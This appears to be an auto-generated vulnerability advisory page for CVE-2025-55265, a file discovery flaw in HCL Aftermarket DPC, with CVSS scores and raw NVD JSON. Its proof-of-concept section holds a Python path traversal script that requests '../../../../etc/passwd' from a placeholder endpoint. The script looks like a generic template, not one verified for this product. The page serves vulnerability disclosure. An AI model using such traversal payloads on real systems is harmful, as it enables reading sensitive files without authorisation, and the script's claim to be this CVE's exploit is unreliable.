Security Vulnerability Report
CVE-2025-55265 CVSS 6.5 MEDIUM

Published: 2026-03-26 13:16:26
Last Modified: 2026-03-26 20:16:45

Description

HCL Aftermarket DPC is affected by a File Discovery vulnerability. An attacker could exploit this issue to read sensitive files present on the system and may use them to craft further attacks.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:hcltech:aftermarket_cloud:1.0.0:*:*:*:*:*:*:* - VULNERABLE
HCL Aftermarket DPC (for the specific affected versions, see vendor advisory KB0129793)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Exploit Title: HCL Aftermarket DPC - File Discovery PoC
# Description: This script attempts to read a sensitive file using path traversal.

target_url = "http://target-ip/vulnerable_endpoint"

# Common payload for path traversal
payload = {
    "file": "../../../../etc/passwd"
}

try:
    response = requests.get(target_url, params=payload, timeout=10)
    if response.status_code == 200:
        print("[+] Vulnerability confirmed!")
        print("[+] Response:")
        print(response.text)
    else:
        print("[-] Exploit failed or target patched.")
except Exception as e:
    print(f"[!] Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-55265", "sourceIdentifier": "[email protected]", "published": "2026-03-26T13:16:25.630", "lastModified": "2026-03-26T20:16:44.820", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HCL Aftermarket DPC is affected by File Discovery which allows attacker could exploit this issue to read sensitive files present in the system and may use it to craft further attacks."}, {"lang": "es", "value": "HCL Aftermarket DPC está afectado por Descubrimiento de Archivos, lo que permite que un atacante podría explotar este problema para leer archivos sensibles presentes en el sistema y podría usarlo para elaborar ataques adicionales."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:aftermarket_cloud:1.0.0:*:*:*:*:*:*:*", "matchCriteriaId": 
"C71E5E64-ED4C-4763-8A74-5F9DDCFD13DA"}]}]}], "references": [{"url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0129793", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}